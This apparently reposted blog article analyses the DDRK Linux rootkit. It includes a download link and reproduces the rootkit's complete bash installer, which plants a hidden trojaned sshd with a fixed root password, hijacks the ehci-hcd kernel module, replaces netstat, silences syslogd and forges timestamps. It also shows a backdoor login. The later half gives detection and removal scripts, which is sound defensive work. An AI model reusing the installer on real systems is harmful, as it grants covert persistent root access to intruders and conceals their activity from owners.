Linux rootkit DDRK: how it installs a hidden root backdoor, and how to remove it

Source: Internet
Author: User

DDRK is a kernel-level rootkit for Linux that combines the SHV rootkit's user-space backdoor (a trojaned sshd started from /etc/inittab, plus a replacement netstat) with the adore-ng kernel module, which hides files and processes.

DDRK files:

netstat    # replaces the system netstat; reads the backdoor port from the sshd configuration file and hides that listener
rk.ko      # kernel module (adore-ng) that hides files and processes
setup      # rootkit installation script (reproduced below)
tty        # adore-ng "ava" control tool: hides/unhides files and hides PIDs
bin.tgz
  --- ttymon
  --- sshd.tgz
      --- .sh
          --- shdcf2    # sshd configuration file
          --- shhk
          --- shhk.pub
          --- shrs
          --- sshd      # backdoor sshd main program (installed as /sbin/ttyload)

DDRK: http://www.sectop.com/soft/ddrk.tgz

Note what the package does and does not do. setup exploits nothing: it refuses to run unless it is already root. What an attacker gains by uploading these files and running setup on a host they have already compromised is persistence. They get a second sshd listening on a port of their choosing, accepting root logins with a fixed password, started from /etc/inittab at every boot, with its files, its process and its listening port hidden from ls, ps and netstat.

 

The setup script is as follows (the remarks the original author added are kept as comments):

#!/bin/bash

########## Define variables ##########
DEFPASS=123456            # default backdoor password if none is given on the command line
DEFPORT=43958             # default port for the backdoor sshd
BASEDIR=`pwd`
SSHDIR=/lib/libsh.so      # a directory named like a shared library; holds the backdoor sshd config and keys
HOMEDIR=/usr/lib/libsh    # home directory of the backdoor shell; also holds the adore control tool "tty"

# Disable shell history so the installation leaves nothing in ~/.bash_history
unset HISTFILE; unset HISTSIZE; unset HISTORY; unset HISTSAVE; unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

########## Check is root ##########
# The installer does not escalate privileges; it only runs when already root
if [ "$(whoami)" != "root" ]; then
  echo "become root and try again"
  echo ""
  exit
fi

########## Extract all tar ##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR

########## Kill syslogd ##########
# Stop logging while files are moved around; syslogd is restarted at the end
killall -9 syslogd >/dev/null 2>&1
sleep 2

########## Remove sh.conf ##########
if [ -f /etc/sh.conf ]; then
  rm -rf /etc/sh.conf            # holds the md5sum of the backdoor password
fi

########## Initialize sshd configuration ##########
if test -n "$1"; then
  echo "Using Password: $1"
  cd $BASEDIR/bin
  echo -n $1 | md5sum > /etc/sh.conf
else
  echo "No Password Specified, using default - $DEFPASS"
  echo -n $DEFPASS | md5sum > /etc/sh.conf
fi

# Copy the timestamps of /bin/ls onto the new file so it does not stand out in a
# listing sorted by time (touch -r cannot forge ctime, see the cleanup notes)
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf

# Build the sshd config: a Port line first, then the shipped shdcf2 appended,
# and the result renamed to shdcf
if test -n "$2"; then
  echo "Using ssh-port: $2"
  echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
  cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config; rm -rf $BASEDIR/bin/.sh/shdcf2
  mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
  echo "No ssh-port Specified, using default - $DEFPORT"
  echo "Port $DEFPORT" > $BASEDIR/bin/.sh/sshd_config
  cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config; rm -rf $BASEDIR/bin/.sh/shdcf2
  mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi

########## Creating dirs ##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then
  rm -rf /lib/libsh.so
fi

if [ -d /usr/lib/libsh ]; then
  rm -rf /usr/lib/libsh/*
fi

mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR

# Remove any previous copy (chattr first, in case it had been made immutable)
if [ -f /sbin/ttyload ]; then
  chattr -AacdisSu /sbin/ttyload
  rm -rf /sbin/ttyload
fi

if [ -f /usr/sbin/ttyload ]; then
  rm -rf /usr/sbin/ttyload
fi

if [ -f /sbin/ttymon ]; then
  rm -rf /sbin/ttymon
fi

# The backdoor sshd becomes /sbin/ttyload, its helper daemon /sbin/ttymon
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

########## Modify inittab ##########
# Insert "0:2345:once:/usr/sbin/ttyload" ahead of the first getty entry so the
# backdoor is started at every boot (the sed pattern is reconstructed from the
# resulting inittab shown further down; this line was damaged in the copy)
cp /etc/inittab /etc/.inittab
sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyload\n&@' /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab

# /usr/sbin/ttyload is a small launcher: start sshd and ttymon, then hide both
# PIDs with the adore control tool ("tty i <pid>"). The backticks are escaped so
# the pidof runs at boot, not now
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i \`pidof ttyload\` >/dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i \`pidof ttymon\` >/dev/null 2>&1" >> /usr/sbin/ttyload

touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /bin/ls /etc/inittab

########## Make sure inittab has modified ##########
if [ ! "`grep ttyload /etc/inittab`" ]; then
  echo "# WARNING - sshd wont be reloaded upon restart"
  echo "# inittab shuffling probly fucked-up!"
fi

########## Load rk.ko ##########
# The module is installed in place of the genuine USB 2.0 host controller
# driver, so every "modprobe ehci-hcd" (including the distribution's own module
# setup at boot) loads the rootkit instead
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR

########## Replace netstat ##########
# Give the trojaned netstat the real binary's timestamps, then swap it in
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat

########## Hide all files and process ##########
$HOMEDIR/tty h /etc/sh.conf >/dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so >/dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh >/dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload >/dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload >/dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon >/dev/null 2>&1
$HOMEDIR/tty i `pidof ttyload` >/dev/null 2>&1
$HOMEDIR/tty i `pidof ttymon` >/dev/null 2>&1

########## Load rk.ko on boot ##########
# On RHEL/CentOS every executable file in /etc/sysconfig/modules/ is run at boot
cat > /etc/sysconfig/modules/ehci.modules <<EOF
#!/bin/sh
# Install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules

chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules >/dev/null 2>&1

########## Check iptables setting ##########
if [ -f /sbin/iptables ]; then
  echo "`/sbin/iptables -L INPUT | head -5`"
else
  echo ""
  echo "# lucky for u no iptables found"
fi

########## Start syslogd ##########
/sbin/syslogd -m 0
 


 

# ./setup 123 3333        # password 123, port 3333
Using Password: 123
Using ssh-port: 3333
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

 

View the hiding in effect:

Processes. Neither ttyload nor ttymon appears; the only match is the egrep itself, because rk.ko filters their PIDs out of /proc:
# ps -ef | egrep -i "ttyload|ttymon"
root     24761 17990  0 00:00:00 pts/2    egrep -i ttyload|ttymon

Ports. The replaced netstat drops the backdoor port from its output. The listener on 43958 that does appear has no PID/Program name: the process owning that socket is hidden from /proc, so netstat cannot attribute it.
# netstat -ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2117/hpiod
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      2267/mysqld
tcp        0      0 0.0.0.0:43958           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      2134/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2295/sendmail: acce
tcp        0      0 127.0.0.1:2207          0.0.0.0:*               LISTEN      2122/python
udp        0      0 0.0.0.0:32768           0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:68              0.0.0.0:*                           19752/dhclient
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:631             0.0.0.0:*                           2134/cupsd

Loaded modules. Nothing is printed, but this grep proves little: lsmod writes module names with underscores (ehci_hcd), so the pattern "ehci-hcd" cannot match even on a clean host, and adore-ng can also unlink itself from the module list. An empty result here is not evidence of absence.
# lsmod | grep -i ehci-hcd

Rootkit files. Naming the paths explicitly still works, because adore-ng hides entries from directory listings (readdir), not from lookups. The numeric owner 2618748389:4063569279 is how adore-ng marks hidden files (its ELITE_UID/ELITE_GID; the module drops entries with these ids from listings), and the Nov 28 2006 timestamps were copied from /bin/ls by the installer's touch -r:
# ls -dl /lib/libsh.so /usr/lib/libsh /etc/sh.conf /sbin/ttyload /sbin/ttymon /bin/ttymon /usr/sbin/ttyload
ls: /bin/ttymon: No such file or directory
-rw-r--r--  1 2618748389 4063569279     36 Nov 28  2006 /etc/sh.conf
drwxr-xr-x  2 2618748389 4063569279   4096 May 11       /lib/libsh.so
-rwxr-xr-x  1 2618748389 4063569279 212747 Nov 28  2006 /sbin/ttyload
-rwxrwxr-x  1 2618748389 4063569279  93476 Nov 28  2006 /sbin/ttymon
drwxr-xr-x  2 2618748389 4063569279   4096 May 11       /usr/lib/libsh
-rwxr-xr-x  1 2618748389 4063569279    171 Nov 28  2006 /usr/sbin/ttyload

The /etc/inittab file. The installer's sed placed the ttyload entry ahead of the first getty:
# Run gettys in standard runlevels
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
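None of the three checks above is conclusive while rk.ko is loaded, but each hiding technique leaves a seam. The triage script below is an added example (not from the DDRK package or the original article) that looks through those seams: it reads listening sockets from /proc/net/tcp and diffs them against what the installed netstat prints, probes /proc/<pid> directly for PIDs that a readdir of /proc does not return, and stats the known drop paths, the inittab hook and every file owned by adore-ng's marker ids. The helper names, the sample /proc/net/tcp and netstat text (constructed, not captured from a host) and the use of 2618748389:4063569279 as adore-ng's ELITE_UID/ELITE_GID are this example's assumptions.

```shell
#!/bin/sh
# Triage helper for a host suspected of running DDRK (adore-ng + SHV sshd).
# Added example; not part of the DDRK package or the original article.
# Assumptions: artifact paths and the inittab line are the ones the setup
# script installs; ADORE_UID/ADORE_GID are the owner ids seen in the ls -dl
# output (adore-ng's ELITE_UID/ELITE_GID); the SAMPLE_* data is constructed.

ADORE_UID=2618748389
ADORE_GID=4063569279

# Items present in list $1 but absent from list $2 (whitespace-separated).
missing_items() {
    for a in $1; do
        found=0
        for b in $2; do
            [ "$a" = "$b" ] && { found=1; break; }
        done
        [ "$found" = 0 ] && printf '%s\n' "$a"
    done
    return 0
}

# /proc/net/tcp text on stdin -> listening ports (state 0A), decimal, sorted.
# Reading the kernel's own socket table sidesteps the trojaned netstat.
proc_listen_ports() {
    while read -r sl laddr raddr st rest; do
        [ "$st" = "0A" ] || continue
        hex=${laddr##*:}
        printf '%d\n' "$((0x$hex))"
    done | sort -un
}

# `netstat -ntl` text on stdin -> listening ports as that netstat reports them.
netstat_listen_ports() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' | sort -un
}

# Ports the kernel listens on that the (possibly replaced) netstat omits.
hidden_listen_ports() {
    kernel=$(proc_listen_ports < /proc/net/tcp)
    shown=$(netstat -ntl 2>/dev/null | netstat_listen_ports)
    missing_items "$kernel" "$shown"
}

# PIDs that open directly under /proc but are missing from a readdir of /proc.
# adore-ng filters readdir, not lookup, so /proc/<pid>/status still answers.
# Slow on hosts with a large pid_max; run it once, not in a loop.
hidden_pids() {
    listed=$(ls /proc | grep -E '^[0-9]+$')
    max=$(cat /proc/sys/kernel/pid_max)
    reachable=""
    i=1
    while [ "$i" -le "$max" ]; do
        [ -r "/proc/$i/status" ] && reachable="$reachable $i"
        i=$((i + 1))
    done
    missing_items "$reachable" "$listed"
}

# Known drop paths, the inittab hook, adore-owned files, and a package check
# for the two files the installer overwrites. `touch -r` does not change
# ctime, so ctime shows when each file was really placed on disk.
ddrk_artifacts() {
    for f in /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload \
             /usr/sbin/ttyload /sbin/ttymon /etc/sysconfig/modules/ehci.modules; do
        [ -e "$f" ] && stat -c 'artifact: %n owner=%u:%g mtime=%y ctime=%z' "$f"
    done
    grep -n ttyload /etc/inittab 2>/dev/null | sed 's/^/inittab: /'
    find / -path /proc -prune -o \( -uid "$ADORE_UID" -o -gid "$ADORE_GID" \) -print 2>/dev/null \
        | sed 's/^/adore-owned: /'
    command -v rpm >/dev/null 2>&1 && rpm -V net-tools "kernel-$(uname -r)" 2>/dev/null | sed 's/^/rpm: /'
    return 0
}

# Constructed sample: the kernel listens on 22, 3333 (0x0D05) and 43958
# (0xABB6), but the netstat output omits 3333, as the replaced netstat would.
SAMPLE_PROC_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0D05 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10002 1 0000000000000000 100 0 0 10 0
   2: 00000000:ABB6 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10003 1 0000000000000000 100 0 0 10 0
   3: 8101A8C0:0016 0101A8C0:C3E2 01 00000000:00000000 00:00000000 00000000     0        0 10004 1 0000000000000000 100 0 0 10 0'
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:43958           0.0.0.0:*               LISTEN'

# Port comparison on the constructed sample; prints the hidden port 3333.
demo_hidden_ports() {
    kernel=$(printf '%s\n' "$SAMPLE_PROC_TCP" | proc_listen_ports)
    shown=$(printf '%s\n' "$SAMPLE_NETSTAT" | netstat_listen_ports)
    missing_items "$kernel" "$shown"
}

# Usage on the suspect host, as root:  sh ddrk_check.sh scan
if [ "${1:-}" = "scan" ]; then
    ddrk_artifacts
    hidden_listen_ports | sed 's/^/hidden listener: tcp port /'
    hidden_pids | sed 's/^/hidden pid: /'
fi
```

Run it from a shell whose PATH puts a known-good toolset first if one is available (a statically linked busybox on removable media, for instance); the script still deliberately calls the host's own netstat in hidden_listen_ports, because that binary is the one under suspicion and the diff against /proc/net/tcp is the point. A hidden listener or a hidden PID is a hard finding; a clean run is not, since a loaded module can also tamper with /proc/net/tcp.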

 

Verification:

The compromised host on which setup was run is 192.168.27.129. From another machine, log in through the backdoor with password 123 on port 3333:

[root@localhost ~]# ssh 192.168.27.129 -p 3333
root@192.168.27.129's password:
Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1
[sh] w.e.l.c.o.m.e
[sh] To The DoDos Rootkit
[root@DoDo:/root]#

[root@DoDo:/root]# env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=192.168.27.130 38824 3333
SSH_TTY=/dev/pts/3
USER=root
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MAIL=/var/spool/mail/root
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.
PWD=/root
MACHINE=DoDo
PS1=\[\033[0;36m\][$ID@\[\033[1;37m\]$MACHINE\[\033[0m\]\[\033[0;36m\]:${PWD}]#\[\033[0m\]
SHLVL=1
HOME=/usr/lib/libsh
ID=root
LOGNAME=root
_=/bin/env

The environment itself gives the session away: HOME is the rootkit's /usr/lib/libsh (where setup dropped a .bashrc), the non-standard MACHINE and ID variables used by PS1 are presumably set by that .bashrc, and PATH ends in ".".

 

At this point 192.168.27.129 is fully under the attacker's control.

 

Back on 192.168.27.129, check the logged-in users. The backdoor session is not listed: the rootkit's sshd does not record logins in utmp/wtmp, so w, who and last all miss it (an allocated /dev/pts entry with no matching who line is the tell):

# w
 13:40:55 up, 0 users, load average: 1.23, 0.93, 0.77
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
Only Local Users are allowed.

 

 

Cleanup:

# cd /usr/lib/libsh
# modprobe -r ehci-hcd
# ./tty u /etc/sysconfig/modules/ehci.modules
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sysconfig/modules/ehci.modules
# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
# ./tty u /etc/sh.conf
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /lib/libsh.so
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttyload
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /usr/sbin/ttyload
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /sbin/ttymon
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon
# rm -rf /bin/netstat
# vim /etc/inittab        # delete the line 0:2345:once:/usr/sbin/ttyload, then run "init q" so init re-reads the file

Every "tty u" above fails with "Adore NOT installed" because the module was unloaded with modprobe -r ehci-hcd one step earlier; the control tool can only talk to a loaded adore module. That is harmless: once the module is gone nothing is hidden any more, so the files can be removed directly and the unhide steps can be skipped altogether.

The steps above also leave three things undone. First, the deleted ehci-hcd.ko was the rootkit, but the genuine USB 2.0 host driver it overwrote is not put back, and /bin/netstat is deleted rather than restored; reinstall the kernel and net-tools packages (rpm -V net-tools kernel-`uname -r` lists what else differs from the packaged files). Second, the backdoor sshd (/sbin/ttyload) and ttymon keep running until they are killed; they reappear in ps as soon as the module is unloaded. Third, the password hashed in /etc/sh.conf and every credential on the host should be treated as exposed.

Finally, DDRK needs root to install, so the attacker already had root before this toolkit ran. Find that entry point and close it; deleting these files removes the persistence, not the cause. A host that has run a kernel-level rootkit is only fully trustworthy again when rebuilt from known-good media.
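A scripted version of this cleanup, written as an added example for a sysvinit RHEL/CentOS host like the one in the article (it is not part of DDRK or of the original post): it unloads the module before touching any file, so the failing tty u step is not needed, and it adds what the manual steps leave out (killing the two daemons, telinit q, and checking the two overwritten packages). The package names net-tools and kernel-`uname -r`, the backup file name /etc/inittab.ddrk-backup and the sample inittab text are this example's assumptions.

```shell
#!/bin/sh
# Scripted DDRK removal for a sysvinit RHEL/CentOS host. Added example; not
# part of the DDRK package or the original article. Assumptions: paths and the
# inittab entry are the ones the setup script installs; net-tools and
# kernel-$(uname -r) are the RPM package names; SAMPLE_INITTAB is constructed.

DDRK_FILES="/etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon /etc/sysconfig/modules/ehci.modules"
DDRK_INITTAB_ENTRY='0:2345:once:/usr/sbin/ttyload'

# inittab text on stdin -> the same text without the rootkit's entry. An exact
# whole-line match (-x -F) so no other entry mentioning ttyload is touched.
inittab_without_ddrk() {
    grep -v -x -F "$DDRK_INITTAB_ENTRY" || true
}

# 1. Unload the module first: while rk.ko is loaded, directory listings, the
#    process table and the module list are all filtered. Returns 1 if the
#    module name is still in /proc/modules afterwards.
unload_rk_module() {
    modprobe -r ehci-hcd 2>/dev/null
    grep -q '^ehci_hcd ' /proc/modules && return 1
    return 0
}

# 2. Stop the backdoor sshd and its helper; both are visible again now.
kill_backdoor() {
    pkill -9 -x ttyload 2>/dev/null
    pkill -9 -x ttymon 2>/dev/null
    return 0
}

# 3. Remove the dropped files and the hijacked module file. chattr first: the
#    installer strips attributes before deleting old copies, so an attacker
#    may well have set +i on them.
remove_artifacts() {
    for f in $DDRK_FILES "/lib/modules/$(uname -r)/kernel/drivers/usb/host/ehci-hcd.ko"; do
        [ -e "$f" ] || continue
        chattr -ia "$f" 2>/dev/null
        rm -rf "$f"
        printf 'removed %s\n' "$f"
    done
}

# 4. Take the boot-time entry out of /etc/inittab, keep the original for the
#    incident record, and make init re-read the file.
fix_inittab() {
    [ -f /etc/inittab ] || return 0
    cp -p /etc/inittab /etc/inittab.ddrk-backup
    inittab_without_ddrk < /etc/inittab.ddrk-backup > /etc/inittab
    telinit q
}

# 5. The manual cleanup deletes netstat and ehci-hcd.ko but restores neither.
#    rpm -V shows every packaged file that differs; reinstalling net-tools
#    brings back the real netstat, and the kernel package the real driver.
restore_packages() {
    rpm -V net-tools "kernel-$(uname -r)" 2>/dev/null
    yum -y reinstall net-tools
    echo "reinstall kernel-$(uname -r) (or restore ehci-hcd.ko from install media) to get the real USB driver back" >&2
}

# Constructed inittab sample for checking the filter before touching /etc/inittab.
SAMPLE_INITTAB='id:3:initdefault:
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1'

demo_inittab_fix() {
    printf '%s\n' "$SAMPLE_INITTAB" | inittab_without_ddrk
}

# Usage, as root on the compromised host:  sh ddrk_clean.sh run
if [ "${1:-}" = "run" ] && [ "$(id -u)" = 0 ]; then
    unload_rk_module || { echo "ehci_hcd still loaded; boot clean media and clean offline" >&2; exit 1; }
    kill_backdoor
    remove_artifacts
    fix_inittab
    restore_packages
fi
```

The order matters: everything after step 1 relies on the module being gone, which is exactly what the manual steps got right and the tty u calls got wrong. Keep the script and its output with the backed-up inittab as part of the incident record, and treat it as containment, not as a substitute for finding the original entry point or rebuilding the host.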

 

This article is from the blog "Yan que an Zhihong zhizai ".
